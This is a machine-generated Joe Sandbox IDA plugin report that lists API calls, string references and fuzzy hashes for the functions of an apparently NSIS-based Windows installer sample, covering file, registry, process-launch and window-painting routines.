                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                      • String ID: F$N$open
                                      • API String ID: 3928313111-1104729357
                                      • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                      • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                      • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                      • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                      APIs
                                      • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                      • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                        • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                      • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                      • wsprintfA.USER32 ref: 00406B79
                                      • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                      • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                      • CloseHandle.KERNEL32(?), ref: 00406C88
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                      • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                      • API String ID: 565278875-3368763019
                                      • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                      • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                      • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                      • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                      APIs
                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                      • BeginPaint.USER32(?,?), ref: 00401047
                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                      • DeleteObject.GDI32(?), ref: 004010F6
                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                      • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                      • DeleteObject.GDI32(?), ref: 0040116E
                                      • EndPaint.USER32(?,?), ref: 00401177
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                      • String ID: F
                                      • API String ID: 941294808-1304234792
                                      • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                      • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                      • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                      • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                      • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      Strings
                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                      • API String ID: 1641139501-220328614
                                      • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                      • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                      • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                      • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                      APIs
                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                      • API String ID: 3734993849-3206598305
                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                      Strings
                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID: created uninstaller: %d, "%s"
                                      • API String ID: 3294113728-3145124454
                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                      Strings
                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                      • (%h, xrefs: 00402473
                                      • `G, xrefs: 0040246E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                      • String ID: (%h$Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                      • API String ID: 1033533793-4029758964
                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                      • GetSysColor.USER32(?), ref: 00403E57
                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                      • DeleteObject.GDI32(?), ref: 00403E81
                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427976,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427976,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                      Strings
                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                      • Exec: success ("%s"), xrefs: 00402263
                                      • Exec: command="%s", xrefs: 00402241
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                      • API String ID: 2014279497-3433828417
                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                      • GetMessagePos.USER32 ref: 0040489D
                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1718024111.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_94e.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                      • MulDiv.KERNEL32(0008BC00,00000064,001BC647), ref: 00403295
                                      • wsprintfW.USER32 ref: 004032A5
                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                      Strings
                                      • verifying installer: %d%%, xrefs: 0040329F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1717823994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1717806685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717858908.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1717882830.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
